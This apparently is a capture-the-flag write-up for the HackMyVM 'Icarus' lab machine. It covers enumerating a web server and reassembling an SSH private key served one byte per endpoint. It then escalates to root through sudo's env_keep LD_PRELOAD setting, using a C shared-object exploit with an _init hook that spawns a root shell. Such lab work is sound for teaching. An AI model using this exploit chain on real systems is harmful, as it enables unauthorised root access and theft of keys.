HMV Icarus Attack Chain
2026-03-23
2026-03-26
Scope
- Name: Icarus
- Difficulty: (2/10)
- OS: Linux
- IP: icarus.hmv (192.168.56.103)
Foothold
Directory enumeration against the web server turns up a handful of endpoints.
```
❯ feroxbuster -u http://icarus.hmv/ -w /usr/share/wordlists/dirb/common.txt -x php,html,txt,js

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.13.1
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://icarus.hmv/
 🚩  In-Scope Url          │ icarus.hmv
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/dirb/common.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.13.1
 💉  Config File           │ /home/curtain/.config/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [php, html, txt, js]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        7l       12w      169c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET     1825l     1824w     9641c http://icarus.hmv/a
200      GET        1l        5w       21c http://icarus.hmv/check.php
200      GET       12l       31w      407c http://icarus.hmv/
200      GET       12l       31w      407c http://icarus.hmv/index.php
302      GET        0l        0w        0c http://icarus.hmv/login.php => index.php
200      GET        1l        1w        1c http://icarus.hmv/xdb
200      GET        1l        1w        1c http://icarus.hmv/xls
200      GET        1l        1w        1c http://icarus.hmv/xml
200      GET        1l        1w        1c http://icarus.hmv/xsl
200      GET        1l        1w        1c http://icarus.hmv/xxx
200      GET        1l        1w        1c http://icarus.hmv/xyz
[####################] - 2s    23075/23075  0s      found:11      errors:1
[####################] - 1s    23070/23070  24543/s http://icarus.hmv/
```
The /a endpoint is a plain listing of every valid path on the host (1825 lines, matching feroxbuster's line count). More interestingly, the names are not random: they run through xaa, xab, xac, ... which is exactly the suffix sequence `split(1)` produces when it breaks a file into chunks.
```
❯ head -20 a.txt
a
xaa
xab
xac
xad
xae
xaf
xag
xah
xai
xaj
xak
xal
xam
xan
xao
xap
xaq
xar
```
Each endpoint returns a single byte (the trailing `%` is zsh marking the missing newline), and read in order the bytes start to spell something very familiar.
```
❯ curl http://icarus.hmv/xaa
-%
❯ curl http://icarus.hmv/xab
-%
❯ curl http://icarus.hmv/xac
-%
❯ curl http://icarus.hmv/xad
-%
❯ curl http://icarus.hmv/xae
-%
❯ curl http://icarus.hmv/xaf
B%
❯ curl http://icarus.hmv/xag
E%
❯ curl http://icarus.hmv/xah
G%
❯ curl http://icarus.hmv/xai
I%
❯ curl http://icarus.hmv/xaj
N%    # -----BEGIN
```
Then I dump them all with a one-liner. The listing starts with `a` itself, so that entry is skipped, and `-s` keeps curl's progress meter out of the reassembled file:

```bash
for d in $(grep -v '^a$' a.txt); do curl -s "http://icarus.hmv/$d"; done > id_rsa
```
Concatenated, the bytes are an SSH private key. The obvious candidate user is icarus, and `ssh -i id_rsa icarus@icarus.hmv` logs in straight away (the key file needs `chmod 600` first, or ssh refuses to use it).
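As an added example (mine, not part of the original writeup), here is the same reassembly done a little more carefully in Python: it reads the /a listing, keeps only split-style chunk names, fetches them in order through a `fetch` callable, checks that the result is PEM-framed key material, and writes it out with the permissions ssh expects. The sample listing and chunks below are constructed for the demonstration (the "key" is fake text, not real key material); against the box you would pass `http_fetcher("http://icarus.hmv/")` instead.

```python
import os
import re
import string
import urllib.request
from typing import Callable, Dict, List

# split(1) default chunk names: xaa, xab, ... (longer suffixes once two letters run out).
CHUNK_RE = re.compile(r"^x[a-z]{2,}$")


def chunk_names(listing: str) -> List[str]:
    """Return the split-style chunk names from the /a listing, in file order.

    GNU split picks suffixes so that plain lexicographic order equals the
    original byte order (xaa..xyz, then xzaaa..), so sorted() is sufficient.
    Anything else in the listing (the 'a' entry itself) is dropped.
    """
    names = {ln.strip() for ln in listing.splitlines() if CHUNK_RE.match(ln.strip())}
    return sorted(names)


def reassemble(listing: str, fetch: Callable[[str], bytes]) -> bytes:
    """Fetch every chunk through fetch(name) and concatenate the bytes."""
    return b"".join(fetch(name) for name in chunk_names(listing))


def looks_like_private_key(data: bytes) -> bool:
    """Cheap sanity check that the reassembled bytes are PEM-framed key material."""
    lines = data.decode("ascii", errors="replace").strip().splitlines()
    if len(lines) < 2:
        return False
    head, tail = lines[0], lines[-1]
    return (head.startswith("-----BEGIN ") and head.endswith("PRIVATE KEY-----")
            and tail.startswith("-----END ") and tail.endswith("PRIVATE KEY-----"))


def http_fetcher(base_url: str) -> Callable[[str], bytes]:
    """Fetcher for a live target, e.g. http_fetcher("http://icarus.hmv/")."""
    return lambda name: urllib.request.urlopen(base_url + name).read()


def save_key(data: bytes, path: str) -> None:
    """Write the key with mode 0600; ssh refuses group/world-readable keys."""
    with open(path, "wb") as f:
        f.write(data)
    os.chmod(path, 0o600)


# ---- Constructed sample data (not a real key): a fake PEM split into 1-byte chunks.
FAKE_KEY = (b"-----BEGIN OPENSSH PRIVATE KEY-----\n"
            b"b3BlbnNzaC1rZXktdjEAAAAA\n"
            b"-----END OPENSSH PRIVATE KEY-----\n")


def split_names(n: int) -> List[str]:
    """Two-letter split suffixes for n <= 676 chunks (enough for the sample)."""
    assert n <= 26 * 26, "sample helper only models two-letter suffixes"
    a = string.ascii_lowercase
    return ["x" + a[i // 26] + a[i % 26] for i in range(n)]


SAMPLE_CHUNKS: Dict[str, bytes] = {
    name: bytes([b]) for name, b in zip(split_names(len(FAKE_KEY)), FAKE_KEY)
}
# The listing as /a would serve it: 'a' first, then the chunk names. The order is
# reversed here to show that reassemble() does not depend on listing order.
SAMPLE_LISTING = "a\n" + "\n".join(reversed(list(SAMPLE_CHUNKS))) + "\n"


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:                       # python3 reassemble.py http://icarus.hmv/
        fetch = http_fetcher(sys.argv[1])
        listing = fetch("a").decode()
    else:                                       # offline demo on the constructed sample
        fetch, listing = (lambda n: SAMPLE_CHUNKS[n]), SAMPLE_LISTING
    key = reassemble(listing, fetch)
    if not looks_like_private_key(key):
        sys.exit("reassembled data is not a PEM private key")
    save_key(key, "id_rsa")
```

The check on the PEM framing is what you want before burning time on `ssh -i`: if a chunk was missed or fetched out of order, the `-----END` line will not be last and ssh's error ("invalid format") tells you nothing about why.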
Privilege Escalation
id information
```
icarus@icarus:~$ id
uid=1000(icarus) gid=1000(icarus) groups=1000(icarus),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
```
SUID files
```
icarus@icarus:~$ find / -mount -perm -u=s 2>/dev/null
/usr/bin/passwd
/usr/bin/su
/usr/bin/mount
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/umount
/usr/bin/sudo
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
```
Only the stock Debian set, nothing custom to chase.
Network Information
```
icarus@icarus:~$ ss -tnlup
Netid State  Recv-Q Send-Q Local Address:Port  Peer Address:Port
udp   UNCONN 0      0            0.0.0.0:68         0.0.0.0:*
tcp   LISTEN 0      128          0.0.0.0:22         0.0.0.0:*
tcp   LISTEN 0      128          0.0.0.0:80         0.0.0.0:*
tcp   LISTEN 0      128             [::]:22            [::]:*
tcp   LISTEN 0      128             [::]:80            [::]:*
```
Only SSH and HTTP; no internal-only service to pivot to.
sudo rules
```
icarus@icarus:~$ sudo -l
Matching Defaults entries for icarus on icarus:
    env_reset, mail_badpass, env_keep+=LD_PRELOAD,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User icarus may run the following commands on icarus:
    (ALL : ALL) NOPASSWD: /usr/bin/id
```
The interesting part is not the command but the Defaults line: `env_keep+=LD_PRELOAD` tells sudo to pass LD_PRELOAD through from my environment instead of scrubbing it as `env_reset` normally does. sudo then executes `/usr/bin/id` with real and effective UID 0, so the dynamic loader does not treat the process as a secure-execution (setuid-style) binary and honours an arbitrary LD_PRELOAD path. Any shared object I name is mapped into that root process and its initializer runs before `id` ever reaches `main`. The NOPASSWD tag only makes it more convenient; the same trick would work for any command in the rule.
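To make that reasoning reusable during enumeration, here is an added example (my own code, not from the writeup): a small parser for `sudo -l` output that reports which loader-controlled variables the policy preserves and which rules would run a caller-supplied shared object as root. It is fed the output captured above; the set of variable names is my own choice of what the dynamic loader reads from the environment.

```python
import re
from typing import Dict, List

# Variables the dynamic loader reads from the environment. If sudo's policy keeps
# any of them (env_keep), the caller controls code mapped into the target as root.
LOADER_VARS = {"LD_PRELOAD", "LD_LIBRARY_PATH", "LD_AUDIT"}

# "(ALL : ALL) NOPASSWD: /usr/bin/id"  ->  runas, optional TAG: list, commands
RULE_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")
# env_keep+=LD_PRELOAD  or  env_keep="A B"
ENV_KEEP_RE = re.compile(r'env_keep\s*\+?=\s*"?([^",]+)"?')


def parse_sudo_l(output: str) -> Dict:
    """Parse `sudo -l` text into kept environment variables and command rules."""
    kept, rules, in_rules = set(), [], False
    for raw in output.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True
            continue
        if in_rules:
            m = RULE_RE.match(line)
            if m:
                tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
                for cmd in m.group("cmds").split(","):
                    rules.append({"runas": m.group("runas").strip(),
                                  "nopasswd": "NOPASSWD" in tags,
                                  "command": cmd.strip()})
            continue
        for m in ENV_KEEP_RE.finditer(line):      # still in the Defaults section
            kept.update(m.group(1).split())
    return {"env_keep": kept, "rules": rules}


def preload_targets(report: Dict) -> List[str]:
    """Commands whose sudo rule would run a caller-supplied shared object as root."""
    if not (report["env_keep"] & LOADER_VARS):
        return []
    return [r["command"] for r in report["rules"]
            if r["runas"].split(":")[0].strip() in ("ALL", "root")]


# The output captured on the box, as shown above.
SUDO_L_OUTPUT = """\
Matching Defaults entries for icarus on icarus:
    env_reset, mail_badpass, env_keep+=LD_PRELOAD,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User icarus may run the following commands on icarus:
    (ALL : ALL) NOPASSWD: /usr/bin/id
"""


if __name__ == "__main__":
    import sys
    text = sys.stdin.read() if not sys.stdin.isatty() else SUDO_L_OUTPUT
    report = parse_sudo_l(text)
    print("kept loader vars:", sorted(report["env_keep"] & LOADER_VARS))
    for cmd in preload_targets(report):
        print("LD_PRELOAD-able as root:", cmd)
```

Usage is `sudo -l | python3 sudo_audit.py`; with no piped input it runs on the captured text. From the defender's side the finding is also the fix: delete the `env_keep+=LD_PRELOAD` entry and sudo's default `env_reset` discards the variable again, after which the rule for `/usr/bin/id` is harmless.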
```c
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

/* Built with -nostartfiles, so this _init replaces the default one and runs
 * the moment the loader maps the object into /usr/bin/id, before main(). */
void _init(void)
{
    unsetenv("LD_PRELOAD");   /* don't preload ourselves into the shell's children */
    setuid(0);
    setgid(0);
    system("/bin/bash");
}
```
Then compile it as a shared library and run the allowed command with the library preloaded (`-fPIC` is required for a shared object on most toolchains; the relative path works because sudo keeps the current directory):

```bash
gcc -fPIC -shared -nostartfiles -o exp.so exp.c
sudo LD_PRELOAD=./exp.so /usr/bin/id
```

The `_init` hook spawns the shell as root before `id` gets to run at all.